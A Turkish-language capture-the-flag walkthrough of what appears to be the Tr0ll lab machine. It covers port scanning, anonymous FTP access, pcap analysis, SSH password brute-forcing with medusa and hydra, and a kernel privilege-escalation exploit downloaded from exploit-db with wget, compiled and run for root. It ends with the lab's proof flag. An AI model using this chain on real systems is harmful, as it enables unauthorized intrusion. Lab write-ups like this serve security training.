$sudo netdiscover

ip –> 192.168.1.42

$nmap -sS -sV -A 192.168.1.42 -p-

21, 22, 80 portlari acik ve ftp servisi anon logine acik

troll

$nikto -h 192.168.1.42

/secret dizini

troll

ssh hakkinda bir fikir yok ftpye  bakiyorum

ftpde anon login ozelliginin aktif oldugunu farkedip login oluyorum

$ftp 192.168.1.42
Connected to 192.168.1.42.
220 (vsFTPd 3.0.2)
Name (192.168.1.42:d1scharg3d): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -larh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
drwxr-xr-x 2 0 112 4096 Aug 10 2014 ..
drwxr-xr-x 2 0 112 4096 Aug 10 2014 .
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (10.5256 MB/s)

burada buldugum lol.pcap dosyasini wireshark ile aciyorum

ftp uzerinden anon login olunmus secret_stuff.txt download edilmis

  1. paket sag tik>follow>tcp stream

Well, well, well, aren’t you just a clever little devil, you almost found the

sup3rs3cr3tdirlol 😛

Sucks, you were so close gotta TRY HARDER!

direk http://192.168.1.42/sup3rs3cr3tdirlol/ adresine girdim

roflmao isimli 32-bit bi elf dosyasi var

$./roflmao
Find address 0x0856BF to proceed

reverse etmekten bi bok cikmayacagini anlamam biraz uzun surdu

adres http://192.168.1.42/0x0856BF/

good_luck klasorunde bir kac satir var username ya da pass olabilir

this_folder_contains_the_password klasorunde Pass.txt adinda bir dosya var

icinde Good_job_:) yaziyo

good_luck klasorundeki kelimeler kullanici adina daha cok benzedigi icin bunlari username

parolayi Good_job_:) deniyorum

$medusa -U which_one_lol.txt -p Good_job_:) -h 192.168.189.197 -M ssh

olmadi

makinanin adi tr0ll ve bu bir ctf ise parola zaten bu olmaz gereksiz bir denemeydi muhtemelen parola Pass.txt

$hydra -L which_one_lol.txt -p Pass.txt 192.168.1.42 ssh

kullanici adi overflowmus

$ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
...
...
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
##linux kernel 3.13 surumune uygun exploit ariyoz
##--> https://www.exploit-db.com/exploits/37292/
$ cd /tmp
$ wget https://www.exploit-db.com/download/37292
...
...
$ls
37292
$ mv 37292 ofs.c
$ gcc ofs.c -o ofs
$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
#ls /root
total 28K
proof.txt
# cat /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc